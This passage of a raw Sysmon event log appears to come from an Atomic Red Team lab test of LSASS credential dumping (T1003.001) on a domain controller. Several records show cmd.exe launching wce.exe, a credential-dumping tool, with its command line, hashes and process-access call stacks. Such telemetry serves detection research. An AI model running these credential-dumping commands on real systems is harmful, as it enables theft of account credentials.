|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025460Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:17.843{4DB9351A-A339-60D3-5106-00000000CF01}68361012C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe{4DB9351A-A339-60D3-5206-00000000CF01}6980C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+159f9b(wow64)|C:\Windows\System32\KERNELBASE.dll+159c4c(wow64)|C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe+11d1|C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe+2016|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x800000000000000025459Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.845{4DB9351A-A339-60D3-5206-00000000CF01}6980C:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe-----C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe -o C:\Users\ADMINI~1\AppData\Local\Temp\wce-output.txt C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=605560CA0624AABF9F53675257B9BE21,SHA256=7234C8F98B87593641BBDB594E34C94B9436986C4FB70E7DA5BCECFF147D14C3,IMPHASH=E96A73C7BF33A464C510EDE582318BF2{4DB9351A-A339-60D3-5106-00000000CF01}6836C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exeC:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe -o C:\Users\ADMINI~1\AppData\Local\Temp\wce-output.txt 11241100x800000000000000025458Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localEXE2021-06-23 
21:10:17.827{4DB9351A-A339-60D3-5106-00000000CF01}6836C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exeC:\Users\ADMINI~1\AppData\Local\Temp\559270fb-001d-4406-944d-8cf62c9b38a1.exe2021-06-23 21:10:17.827 10341000x800000000000000025457Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.796{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A339-60D3-5106-00000000CF01}6836C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025456Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.768{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A339-60D3-5106-00000000CF01}6836C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025455Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:17.768{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025454Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.768{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025453Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:17.768{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025452Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.750{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025451Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:17.750{4DB9351A-A339-60D3-5006-00000000CF01}64802868C:\Windows\system32\cmd.exe{4DB9351A-A339-60D3-5106-00000000CF01}6836C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000025450Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.763{4DB9351A-A339-60D3-5106-00000000CF01}6836C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe-----C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe -o C:\Users\ADMINI~1\AppData\Local\Temp\wce-output.txt C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=BE9387BF647993E501C5D78E49BD4AB5,SHA256=C6333C684762ED4B4129C7F9F49C88C33384B66DFB1F100E459EC6F18526DFF7,IMPHASH=8AB93B061287C79F3088C5BC7E7D97ED{4DB9351A-A339-60D3-5006-00000000CF01}6480C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe -o %temp%\wce-output.txt" 10341000x800000000000000025449Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.750{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A339-60D3-5006-00000000CF01}6480C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000025448Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:17.750{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=412AD5DE910F90E69CC75E92553B7808,SHA256=13CE8C32A2329DCE6E71A268C4ABBD3E3BA2121DFFDD1786DBA1A17D29E4FE47,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025447Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.750{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A339-60D3-5006-00000000CF01}6480C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025446Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:17.750{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025445Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.750{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025444Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:17.750{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025443Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.750{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025442Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:17.750{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A339-60D3-5006-00000000CF01}6480C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025441Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.735{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A339-60D3-5006-00000000CF01}6480C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.
dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025440Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:17.749{4DB9351A-A339-60D3-5006-00000000CF01}6480C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "C:\AtomicRedTeam\atomics\T1003.001\bin\wce.exe -o %%temp%%\wce-output.txt" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000025439Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.735{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-06-23 21:09:49.615 11241100x800000000000000025438Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.735{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-06-23 21:09:49.615 23542300x800000000000000025437Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.577{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=254299143D15B0C3A2B9CB2B5A50D46A,SHA256=68D48FC8CF64D9FD9AB86860E8EF17A58FA5FC4A86AA6F6F187DD74CB83E1961,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025436Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:17.499{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A339-60D3-4F06-00000000CF01}6792C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025435Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.499{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025434Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:17.499{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025433Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:17.499{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084872C:\Windows\system32\csrss.exe{4DB9351A-A339-60D3-4F06-00000000CF01}6792C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025432Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:17.499{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025431Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 